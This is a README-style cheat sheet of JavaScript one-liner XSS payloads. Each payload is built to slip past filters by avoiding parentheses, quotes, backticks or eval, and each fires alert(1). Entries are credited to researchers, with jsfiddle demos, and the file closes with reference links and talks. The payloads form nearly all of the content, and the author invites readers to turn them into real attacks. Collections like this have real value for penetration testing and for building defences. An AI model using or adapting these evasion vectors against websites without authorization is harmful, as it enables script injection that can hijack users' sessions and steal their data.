└── README.md


/README.md:
--------------------------------------------------------------------------------
 1 | # XSS oneliners payloads that rocks your nuts!
 2 | 
 3 | This was a list that I use often has a reference tool that I decided to publish. If you want to contribute your welcome, just tweet me at [@dsopas](https://twitter.com/dsopas) or something. Critics are always welcome!
 4 | 
 5 | BTW: the result is always to alert the number 1, if you want to do a real attack scenario just modify the vectors above.
 6 | 
 7 | ## Without parentheses and quotes
 8 | ```javascript
 9 | self[0X10f8809.toString`36`]`1`
10 | ```
11 | 
12 | PS: You can also use top instead of self to cut down 1 char.
13 | 
14 | Online: [https://jsfiddle.net/hx7kypv6/]() by [@aemkei](https://twitter.com/aemkei)
15 | 
16 | ```javascript
17 | x=alert,x`1`
18 | ```
19 | 
20 | Online: [https://jsfiddle.net/0bp4b2mf/]() - don't know really...
21 | 
22 | ## Without quotes or backticks
23 | 
24 | ```javascript
25 | Object.bind(null,alert)()(1)
26 | ```
27 | 
28 | Online: [https://jsfiddle.net/w99tv481/]() by [@garethheyes](https://twitter.com/garethheyes)
29 | 
30 | ## Eval without eval() and without quotes
31 | 
32 | ```javascript
33 | atob.constructor`alert\`1\````
34 | ```
35 | 
36 | Online: [https://jsfiddle.net/r4tdhs1L/]() by [@aemkei](https://twitter.com/aemkei)
37 | 
38 | ## Other evading payloads
39 | 
40 | ```javascript
41 | Function('x=alert`1`','y')()
42 | ```
43 | 
44 | Online: [https://jsfiddle.net/qawpegx9/]() by [@garethheyes](https://twitter.com/garethheyes)
45 | 
46 | ```javascript
47 | /1/[Symbol.replace]('1',alert)
48 | ```
49 | 
50 | Online: [https://jsfiddle.net/7m9ex6L8/]() by [@garethheyes](https://twitter.com/garethheyes)
51 | 
52 | ```javascript
53 | Array.from([1],alert)
54 | ```
55 | 
56 | Online: [https://jsfiddle.net/ck5v3zgk/]() by [@garethheyes](https://twitter.com/garethheyes)
57 | 
58 | # Resources
59 | 
60 | * [XSSChallengeWiki](https://github.com/cure53/XSSChallengeWiki/wiki/prompt.ml)
61 | * [JSFuck - Write any JavaScript with 6 Characters](https://github.com/aemkei/jsfuck)
62 | * [HTML5 Security Cheatsheet](https://html5sec.org/)
63 | * [XSS Polyglot Challenge](http://polyglot.innerht.ml/)
64 | * [XSS Mindmap](https://github.com/jackmasa/XSS.png)
65 | 
66 | 
67 | # Talks
68 | 
69 | * [AppSec EU 2017 Don't Trust The DOM: Bypassing XSS Mitigations Via Script Gadgets by Sebastian Lekies](https://www.youtube.com/watch?v=p07acPBi-qw)
70 | * [AppSec EU15 - Gareth Heyes - XSS Horror Show](https://www.youtube.com/watch?v=yv5OtiIJwEE)
71 | * [nullcon Goa 2015: ECMA Script 6 from an Attacker's Perspective by Mario Heiderich](https://www.youtube.com/watch?v=QnqFq-lcJ1I)


--------------------------------------------------------------------------------